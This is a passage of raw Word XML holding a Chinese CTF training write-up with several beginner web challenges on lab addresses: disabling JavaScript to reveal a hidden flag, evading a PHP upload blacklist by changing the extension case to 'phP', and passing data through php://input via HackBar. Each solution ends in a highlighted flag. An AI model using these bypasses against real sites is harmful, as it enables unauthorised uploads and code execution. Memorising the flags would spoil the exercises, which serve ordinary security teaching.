        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，有前面的描述有些联系，点击查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C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214506" cy="2131017"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="23" name="图片 23" descr="http://192.168.109.235/storage/images/20181205110021eq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192.168.109.235/storage/images/20181205110021eqN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195" cy="215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3C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C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F23C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F23C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3F23C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F23C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>翻到最下面，赫然发现</w:t>
      </w:r>
      <w:r w:rsidRPr="003F23C6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3F23C6" w:rsidRPr="003F23C6" w:rsidRDefault="003F23C6" w:rsidP="003F23C6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2031980" cy="6903892"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="http://192.168.109.235/storage/images/20181205110029Iy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192.168.109.235/storage/images/20181205110029Iyi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5746" cy="6906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A2A" w:rsidRPr="00775A2A" w:rsidRDefault="00775A2A" w:rsidP="00775A2A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00775A2A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cYKolDSeSU3zkFmjoS4naezfv5rVsvTQdBcWQj8MnTJjfIYjdeWrLl2T4GuGik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F23C6" w:rsidRPr="00775A2A" w:rsidRDefault="003F23C6" w:rsidP="003F23C6"/>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>你</w:t>
      </w:r>
      <w:r w:rsidR="008103DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>住了吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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8103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA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8103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA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8103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>浏览器默认开启</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>挡住了</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA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103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA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103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA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8103DA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8103DA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8103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/21,</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA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8103DA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8103DA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8103DA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8103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103DA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8103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103D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103D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8103D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103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开谷歌浏览器输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA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&lt;http://10.10.23.105/21/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="008103D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8103D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8103DA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8103DA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8103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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05964" cy="3293874"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="28" name="图片 28" descr="http://192.168.109.235/storage/images/20181207141158sj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192.168.109.235/storage/images/20181207141158sjC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319" cy="3301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3DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103D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103D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8103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：在设置中找到隐私和安全设置</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内容设置</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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039250" cy="2949408"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="27" name="图片 27" descr="http://192.168.109.235/storage/images/20181207142612a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192.168.109.235/storage/images/20181207142612aIO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234" cy="2971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3DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103D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103D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8103D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103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>将已允许设置成已屏蔽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008103DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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824209" cy="3120272"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="26" name="图片 26" descr="http://192.168.109.235/storage/images/20181207142634qr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192.168.109.235/storage/images/20181207142634qrz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927" cy="31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3DA" w:rsidRPr="008103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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103D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103D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8103D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103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>重新访问网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA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&lt;http://10.10.23.105/21/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008103DA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8103DA" w:rsidRDefault="008103DA" w:rsidP="008103DA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93963" cy="1303835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="25" name="图片 25" descr="http://192.168.109.235/storage/images/20181207141217X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192.168.109.235/storage/images/20181207141217X3d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90" cy="132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A2A" w:rsidRPr="008103DA" w:rsidRDefault="00775A2A" w:rsidP="00775A2A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00775A2A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pG3z5z9GT3RKgFMYSS2Rt0aPICPSJoWYP2DJd6cIUaJd3hbxx3u3Dnqqd7EmP6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRDefault="001D1A80" w:rsidP="009447CD">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能上传图片哦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行上传限制，绕过黑名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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/24,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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD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&lt;http://10.10.23.105/24&gt;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 (</w:t>
      </w:r>
      <w:r w:rsidRPr="009447C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9447C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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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335356" cy="3512303"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 31" descr="http://192.168.109.235/storage/images/20181207165140BH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192.168.109.235/storage/images/20181207165140BHh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517" cy="352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7CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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步骤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：上传一个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php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文件试试，发现是一个上传黑名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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77658" cy="1100193"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="30" name="图片 30" descr="http://192.168.109.235/storage/images/20181207165147iW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192.168.109.235/storage/images/20181207165147iWH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794" cy="112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7CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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：想办法绕过这个黑名单，修改后缀名</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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phP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，再次上传，成功得到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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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324798" cy="1476254"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="图片 29" descr="http://192.168.109.235/storage/images/20181207165152jr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192.168.109.235/storage/images/20181207165152jrh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14" cy="149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7CD" w:rsidRPr="004A4588" w:rsidRDefault="004A4588" w:rsidP="004A4588">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="004A4588">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nNxCQVvND5qSeS6t3TKKjXsnXmFgcGPSNxN3IrTmyxsUyWf9wKxVp64qviNTsb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>谁是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代表可以访问请求的原始数据，简单来说</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求的情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以获取到</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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9447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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/25,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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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447CD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9447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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php://input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代表可以访问请求的原始数据，简单来说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POST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请求的情况下，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php://input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可以获取到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post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的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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9447C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9447C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9447C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打开火狐浏览器，输入链接</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD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&lt;http://10.137.0.102/25/&gt;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9447C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9447C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) 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访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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302681" cy="2256025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="图片 36" descr="http://192.168.109.235/storage/images/20181210102453k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192.168.109.235/storage/images/20181210102453kCh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316" cy="227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7CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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9447C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9447C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9447C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如果没有的话，安装</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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HackBar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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857750" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="35" name="图片 35" descr="http://192.168.109.235/storage/images/20181210101356F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192.168.109.235/storage/images/20181210101356Feq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7CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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9447C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9447C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9447C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如果没有显示，默认按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F9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开启</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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569542" cy="3252014"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="34" name="图片 34" descr="http://192.168.109.235/storage/images/20181210102537vN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192.168.109.235/storage/images/20181210102537vNV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782" cy="3267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7CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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9447C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9447C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9447C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如图输入</w:t>
      </w:r>
      <w:r w:rsidRPr="009447CD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&lt;http://10.137.0.102/25/?ctf=php://input&gt;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，勾选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Enable Post data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。在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Post data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处填写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the user is admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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524500" cy="4162425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="33" name="图片 33" descr="http://192.168.109.235/storage/images/20181210102657aU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192.168.109.235/storage/images/20181210102657aUg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7CD" w:rsidRPr="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447C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</w:t>
      </w:r>
      <w:r w:rsidRPr="009447C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9447C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9447C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9447CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>成功弹出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009447CD" w:rsidRDefault="009447CD" w:rsidP="009447CD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257107" cy="3104557"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="32" name="图片 32" descr="http://192.168.109.235/storage/images/20181210102843RX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192.168.109.235/storage/images/20181210102843RXW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590" cy="31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AE3" w:rsidRPr="009447CD" w:rsidRDefault="00B37AE3" w:rsidP="00B37AE3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B37AE3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1181c1834012245d785120e3505ed169</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>照猫画虎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21FF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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21F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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21FF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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则表达式是一种描述字符串结果的语法规则，是一个特定的格式化模式，可以匹配、替换、截取匹配的字符串。常用的语言基本上都有正则表达式，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21FF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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则表达式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21FF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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21FF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BE21FF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BE21FF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BE21FF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BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/26,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF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BE21FF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BE21FF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BE21FF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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21F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BE21F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BE21FF" w:rsidRPr="00BE21FF" w:rsidRDefault="00BE21FF" w:rsidP="00BE21FF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BE21FF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正则表达式是一种描述字符串结果的语法规则，是一个特定的格式化模式，可以匹配、替换、截取匹配的字符串。常用的语言基本上都有正则表达式，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE21FF">
        <w:rPr>
